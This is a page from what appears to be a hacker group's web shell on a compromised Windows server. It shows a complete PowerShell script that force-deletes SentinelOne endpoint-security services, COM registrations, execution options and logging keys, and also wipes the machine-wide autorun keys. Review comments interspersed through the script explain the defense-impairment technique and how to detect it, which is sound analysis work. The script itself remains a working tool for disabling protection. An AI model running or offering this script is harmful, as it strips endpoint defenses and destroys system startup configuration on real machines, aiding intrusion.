Dre4m Shell
Server IP : 103.6.199.200  /  Your IP : 18.223.213.76
Web Server : Microsoft-IIS/10.0
System : Windows NT EMPUSA 10.0 build 20348 (Windows Server 2016) i586
User : EMPUSA$ ( 0)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/


Current File : C://RegDel.ps1
# Registry paths this script will try to delete. Every entry is either a key
# named for a SentinelOne component (agent, helper service, monitor, static
# engine, log processor, autologger sessions), a COM registration GUID, or,
# near the end of the list, a general Windows autorun key.
#
# NOTE(review): the page shows this file through a web-shell file viewer; it
# does not show who wrote the script or whether it was executed. If it was
# run without authorization, removing an endpoint agent's service and COM
# registrations is defense impairment (MITRE ATT&CK T1562.001, Impair
# Defenses: Disable or Modify Tools), and the host's agent health should be
# checked from the management console rather than trusted locally.
#
# NOTE(review): entries are kept exactly as they appear on the page, spelling
# included. When scoping impact, compare the list against the host's actual
# registry and telemetry instead of assuming every listed path resolved.
$registryKeys = @(
    # COM registrations (AppID / CLSID / Interface / TypeLib) and file-type
    # classes, addressed through an HKCR: drive.
    "HKCR:\AppID\{1ECB7470-7BA4-4F64-A41D-BDF1B38DEED8}",
    "HKCR:\AppID\{4F58E51B-3F2B-4807-AB8C-2A7F143E9C3F}",
    "HKCR:\AppID\SentinelHelperService",
    "HKCR:\CLSID\{28B58EFD-EED3-49D0-9AC3-A7A9E39A6303}",
    "HKCR:\CLSID\{DFE127B0-F72C-40FB-BEF8-9F29CB996B9C}",
    "HKCR:\Interface\{0420773B-38C3-4300-AD2B-23652FEEE26C}",
    "HKCR:\Interface\{51821FE8-516B-4BE3-9578-31B2DFAD4042}",
    "HKCR:\Interface\{8E470FB5-6800-4FF6-8E0A-620F676C912E}",
    "HKCR:\SentinelAgent",
    "HKCR:\SentinelHelper",
    "HKCR:\SentinelOneLog",
    "HKCR:\TypeLib\{667D5A92-7C14-4687-B20E-A5CF06FEF1AF}",
    "HKCR:\TypeLib\{BED0DAEE-A8DC-40E6-AAD6-DCA5532B746C}",
    "HKCR:\WOW6432Node\AppID\{1ECB7470-7BA4-4F64-A41D-BDF1B38DEED8}",
    "HKCR:\WOW6432Node\AppID\{4F58E51B-3F2B-4807-AB8C-2A7F143E9C3F}",
    "HKCR:\WOW6432Node\AppID\SentinelHelperService",
    "HKCR:\WOW6432Node\Interface\{0420773B-38C3-4300-AD2B-23652FEEE26C}",
    "HKCR:\WOW6432Node\Interface\{51821FE8-516B-4BE3-9578-31B2DFAD4042}",
    "HKCR:\WOW6432Node\Interface\{8E470FB5-6800-4FF6-8E0A-620F676C912E}",
    "HKCR:\AppID\SentinelAgent",
    "HKCR:\WOW6432Node\TypeLib\{667D5A92-7C14-4687-B20E-A5CF06FEF1AF}",
    "HKCR:\WOW6432Node\TypeLib\{BED0DAEE-A8DC-40E6-AAD6-DCA5532B746C}",
    # The same COM registrations and classes under HKLM:\SOFTWARE\Classes.
    "HKLM:\SOFTWARE\Classes\AppID\{1ECB7470-7BA4-4F64-A41D-BDF1B38DEED8}",
    "HKLM:\SOFTWARE\Classes\AppID\{4F58E51B-3F2B-4807-AB8C-2A7F143E9C3F}",
    "HKLM:\SOFTWARE\Classes\AppID\SentinelHelperService",
    "HKLM:\SOFTWARE\Classes\CLSID\{28B58EFD-EED3-49D0-9AC3-A7A9E39A6303}",
    "HKLM:\SOFTWARE\Classes\CLSID\{DFE127B0-F72C-40FB-BEF8-9F29CB996B9C}",
    "HKLM:\SOFTWARE\Classes\Interface\{0420773B-38C3-4300-AD2B-23652FEEE26C}",
    "HKLM:\SOFTWARE\Classes\Interface\{51821FE8-516B-4BE3-9578-31B2DFAD4042}",
    "HKLM:\SOFTWARE\Classes\Interface\{8E470FB5-6800-4FF6-8E0A-620F676C912E}",
    "HKLM:\SOFTWARE\Classes\SentinelAgent",
    "HKLM:\SOFTWARE\Classes\SentinelHelper",
    "HKLM:\SOFTWARE\Classes\SentinelOneLog",
    "HKLM:\SOFTWARE\Classes\TypeLib\{667D5A92-7C14-4687-B20E-A5CF06FEF1AF}",
    "HKLM:\SOFTWARE\Classes\TypeLib\{BED0DAEE-A8DC-40E6-AAD6-DCA5532B746C}",
    "HKLM:\SOFTWARE\Classes\WOW6432Node\AppID\{1ECB7470-7BA4-4F64-A41D-BDF1B38DEED8}",
    "HKLM:\SOFTWARE\Classes\WOW6432Node\AppID\{4F58E51B-3F2B-4807-AB8C-2A7F143E9C3F}",
    "HKLM:\SOFTWARE\Classes\WOW6432Node\AppID\SentinelHelperService",
    "HKLM:\SOFTWARE\Classes\WOW6432Node\Interface\{0420773B-38C3-4300-AD2B-23652FEEE26C}",
    "HKLM:\SOFTWARE\Classes\WOW6432Node\Interface\{51821FE8-516B-4BE3-9578-31B2DFAD4042}",
    "HKLM:\SOFTWARE\Classes\WOW6432Node\Interface\{8E470FB5-6800-4FF6-8E0A-620F676C912E}",
    "HKLM:\SOFTWARE\Classes\WOW6432Node\TypeLib\{667D5A92-7C14-4687-B20E-A5CF06FEF1AF}",
    "HKLM:\SOFTWARE\Classes\WOW6432Node\TypeLib\{BED0DAEE-A8DC-40E6-AAD6-DCA5532B746C}",
    # Add/Remove Programs entry and Image File Execution Options subkeys named
    # after Sentinel executables.
    "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sentinel Agent",
    "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SentinelAgent.exe",
    "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SentinelCtl.exe",
    "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SentinelHelperService.exe",
    "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SentinelRemediation.exe",
    "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SentinelServiceHost.exe",
    "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SentinelStaticEngine.exe",
    "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SentinelStaticEngineScanner.exe",
    "HKLM:\SOFTWARE\SentinelOneLog",
    # 32-bit (WOW6432Node) views of the same classes and IFEO subkeys.
    "HKLM:\SOFTWARE\WOW6432Node\Classes\AppID\{1ECB7470-7BA4-4F64-A41D-BDF1B38DEED8}",
    "HKLM:\SOFTWARE\WOW6432Node\Classes\AppID\{4F58E51B-3F2B-4807-AB8C-2A7F143E9C3F}",
    "HKLM:\SOFTWARE\WOW6432Node\Classes\AppID\SentinelHelperService",
    "HKLM:\SOFTWARE\WOW6432Node\Classes\Interface\{0420773B-38C3-4300-AD2B-23652FEEE26C}",
    "HKLM:\SOFTWARE\WOW6432Node\Classes\Interface\{51821FE8-516B-4BE3-9578-31B2DFAD4042}",
    "HKLM:\SOFTWARE\WOW6432Node\Classes\Interface\{8E470FB5-6800-4FF6-8E0A-620F676C912E}",
    "HKLM:\SOFTWARE\WOW6432Node\Classes\TypeLib\{667D5A92-7C14-4687-B20E-A5CF06FEF1AF}",
    "HKLM:\SOFTWARE\WOW6432Node\Classes\TypeLib\{BED0DAEE-A8DC-40E6-AAD6-DCA5532B746C}",
    "HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SentinelAgent.exe",
    "HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SentinelCtl.exe",
    "HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SentinelHelperService.exe",
    "HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SentinelRemediation.exe",
    "HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SentinelServiceHost.exe",
    "HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SentinelStaticEngine.exe",
    "HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SentinelStaticEngineScanner.exe",
    # WMI autologger sessions and service definitions, listed under
    # ControlSet001, CurrentControlSet and Setup\FirstBoot.
    "HKLM:\SYSTEM\ControlSet001\Control\WMI\Autologger\SentinelLogger",
    "HKLM:\SYSTEM\ControlSet001\Control\WMI\Autologger\SentinelLogSessin0",
    "HKLM:\SYSTEM\ControlSet001\Control\WMI\Autologger\SentinelStatic",
    "HKLM:\SYSTEM\ControlSet001\Services\LogProcessorService",
    "HKLM:\SYSTEM\ControlSet001\Services\SentinelAgent",
    "HKLM:\SYSTEM\ControlSet001\Services\SentinelHelperService",
    "HKLM:\SYSTEM\ControlSet001\Services\SentinelMonitor",
    "HKLM:\SYSTEM\ControlSet001\Services\SentinelStaticEngine",
    "HKLM:\SYSTEM\CurrentControlSet\Control\WMI\Autologger\SentinelLogger",
    "HKLM:\SYSTEM\CurrentControlSet\Control\WMI\Autologger\SentinelLogSession0",
    "HKLM:\SYSTEM\CurrentControlSet\Control\WMI\Autologger\SentinelStatic",
    "HKLM:\SYSTEM\CurrentControlSet\Services\LogProcessorService",
    "HKLM:\SYSTEM\CurrentControlSet\Services\SentinelAgent",
    "HKLM:\SYSTEM\CurrentControlSet\Services\SentinelHelperService",
    "HKLM:\SYSTEM\CurrentControlSet\Services\SentinelMonitor",
    "HKLM:\SYSTEM\CurrentControlSet\Services\SentinelStaticEngine",
    "HKLM:\SYSTEM\Setup\FirstBoot\Services\LogProcessorService",
    "HKLM:\SYSTEM\Setup\FirstBoot\Services\SentinelAgent",
    "HKLM:\SYSTEM\Setup\FirstBoot\Services\SentinelHelperService",
    "HKLM:\SYSTEM\Setup\FirstBoot\Services\SentinelMonitor",
    "HKLM:\SYSTEM\Setup\FirstBoot\Services\SentinelStaticEngine",
    "HKCU:\Software\Microsoft\Windows\CurrentVersion\ApplicationAssociationToasts\SentinelOneLog_.binlog",
    # WARNING(review): the next two entries are the machine-wide autorun keys
    # themselves, not a SentinelOne-specific subkey. The removal function in
    # this file deletes with -Recurse -Force, so every autorun value stored
    # under them is lost, whichever product registered it. During recovery,
    # restore these keys from a known-good backup or baseline.
    "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run",
    "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
    # Repeats of paths already listed above.
    "HKLM:\SYSTEM\CurrentControlSet\Services\SentinelAgent",
    "HKLM:SOFTWARE\SentinelOneLog",
    "HKLM:\SYSTEM\CurrentControlSet\services\SentinelMonitor"
)

# Remove-RegistryKey: deletes one registry key and everything beneath it.
#
# Parameters:
#   keyPath - provider path of the key (e.g. an "HKLM:\..." string).
# Output:
#   Writes "Removed: <path>" or "Key not found: <path>" to the output stream.
#
# NOTE(review): "Removed:" is written after Remove-Item without checking its
# result. Unless the caller's error preference makes a failure terminating,
# the line also appears when the delete was denied, so captured output from
# this script is not proof that a key is gone. Confirm against the registry
# itself or against telemetry.
#
# Detection: where enabled, PowerShell script block logging (Event ID 4104)
# records this script's text, and Sysmon Event ID 12 (registry object create
# and delete) records the key deletions. Bulk deletion of security-agent
# service keys from a non-installer process is worth alerting on.
function Remove-RegistryKey {
    param (
        [string]$keyPath
    )
    # Only attempt deletion when the path resolves; a missing path is reported
    # rather than treated as an error.
    if (Test-Path $keyPath) {
        # -Recurse removes all subkeys; -Force suppresses confirmation.
        Remove-Item -Path $keyPath -Recurse -Force
        Write-Output "Removed: $keyPath"
    } else {
        Write-Output "Key not found: $keyPath"
    }
}

# Run the removal once per listed path, in list order. There is no prompt,
# dry-run switch or backup step, so the script acts as soon as it is invoked.
# A path listed more than once reports "Key not found" on the repeat if the
# earlier removal succeeded.
foreach ($key in $registryKeys) {
    Remove-RegistryKey -keyPath $key
}

Anon7 - 2022
AnonSec Team